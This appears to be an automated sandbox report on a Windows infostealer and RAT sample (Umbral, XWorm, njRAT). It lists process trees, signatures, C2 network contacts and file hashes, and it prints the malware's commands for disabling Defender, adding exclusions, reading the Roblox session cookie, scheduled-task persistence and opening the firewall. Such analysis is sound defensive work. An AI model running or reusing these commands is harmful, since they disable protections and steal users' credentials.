SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2880-109-0x0000000002560000-0x0000000002568000-memory.dmp

memory/1964-117-0x0000000001040000-0x0000000001050000-memory.dmp

memory/1688-119-0x00000000012E0000-0x00000000012F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-11 16:11

Reported

2024-07-11 16:13

Platform

win10v2004-20240704-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

njRAT/Bladabindi

trojan njrat

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Server.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Server.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 1900 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 1900 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 1900 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 1900 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 1900 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 3984 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3984 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 3984 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 3984 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4548 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4548 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4308 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\attrib.exe
PID 4308 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\attrib.exe
PID 4308 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 532 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 532 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\schtasks.exe
PID 836 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\schtasks.exe
PID 4308 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4308 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\cmd.exe
PID 4308 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\cmd.exe
PID 2044 wrote to memory of 4768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2044 wrote to memory of 4768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

C:\Users\Admin\AppData\Local\Temp\Server.exe

"C:\Users\Admin\AppData\Local\Temp\Server.exe"

C:\Users\Admin\AppData\Local\Temp\3.exe

"C:\Users\Admin\AppData\Local\Temp\3.exe"

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

"C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Users\Admin\AppData\Roaming\Server.exe

"C:\Users\Admin\AppData\Roaming\Server.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.187.195:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 testarosa.duckdns.org udp
DE 158.255.214.24:7110 testarosa.duckdns.org tcp
US 147.185.221.20:49236 tcp
US 8.8.8.8:53 24.214.255.158.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 147.185.221.20:49236 tcp
US 8.8.8.8:53 200.201.50.20.in-addr.arpa udp

Files

memory/1900-0-0x00007FFB7C0C3000-0x00007FFB7C0C5000-memory.dmp

memory/1900-1-0x0000000000E70000-0x0000000001630000-memory.dmp

memory/1900-2-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Server.exe

MD5 f9b08bd21b40a938122b479095b7c70c
SHA1 eb925e3927b83c20d8d24bdab2e587c10d6ac8cd
SHA256 c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8
SHA512 fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

C:\Users\Admin\AppData\Local\Temp\3.exe

MD5 ed59c6590b199b2ee53eec444322472b
SHA1 6c91f4e2489a9869ab971061fdd67a0eeb1e7007
SHA256 aa4abbb1305525b1703a23521db1e817dfd39f014527c319a16a153d2d9dcb0f
SHA512 7dd903995d2c673a3778c5f4f5006cdf3e177ad9093649e5e953894e49f386049ae1e58103095874f09b91d4e21d963d05f02ea9644ed67dd3054aa10b47ba97

memory/4548-24-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/4548-26-0x0000000000C20000-0x0000000000C38000-memory.dmp

memory/3984-29-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/3984-28-0x0000000000D50000-0x0000000000D9A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Server.exe

MD5 32fe01ccb93b0233503d0aaaa451f7b2
SHA1 58e5a63142150e8fb175dbb4dedea2ce405d7db0
SHA256 6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43
SHA512 76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

C:\Users\Admin\AppData\Roaming\conhost.exe

MD5 b37dd1a1f0507baf993471ae1b7a314c
SHA1 9aff9d71492ffff8d51f8e8d67f5770755899882
SHA256 e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc
SHA512 ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

C:\Users\Admin\AppData\Roaming\3.exe

MD5 66d7e8125484efe9585adf807f3860ec
SHA1 aad54a84cc6bfcd422631bfce7b187b001ec0128
SHA256 9cc7b63b2a2c95cfdd1f0f9044f6f760d8dae0d622aa07cb18ce071d9c491d4e
SHA512 f0eabf14bab037689568dc6f7bb6126d1c5922e08432b650e338567c7ae2d70d1ac3420dfec0501453a0e8fece11482071434137e70d62e1136dd482a791d5d5

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

MD5 8b39a0c9d351c316ae38251db3e917da
SHA1 71c988393af62584e93ebe721a600c1a51fa7c29
SHA256 aacbefe172556a5df9e5bf52834aaa22893002edeb46533e1a85866cc7462a15
SHA512 092f06c5f373a65be4f4784357596422df1bb50dcd81c0056464c70f99a0845d71e6819f01c8e7a2ca3f663ad4125588b6e48d88ec0736e7305a70bd8c59e9af

memory/4308-70-0x000001EC18680000-0x000001EC186C0000-memory.dmp

memory/836-84-0x00000000002D0000-0x00000000002E0000-memory.dmp

memory/4548-83-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/3984-82-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/1900-81-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/1536-91-0x0000021E74020000-0x0000021E74042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bglhk2tl.fog.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/4308-111-0x000001EC1A3F0000-0x000001EC1A466000-memory.dmp

memory/4308-117-0x000001EC1A320000-0x000001EC1A370000-memory.dmp

memory/4308-122-0x000001EC18B40000-0x000001EC18B5E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 994d48c590292933efa0627922c9fc59
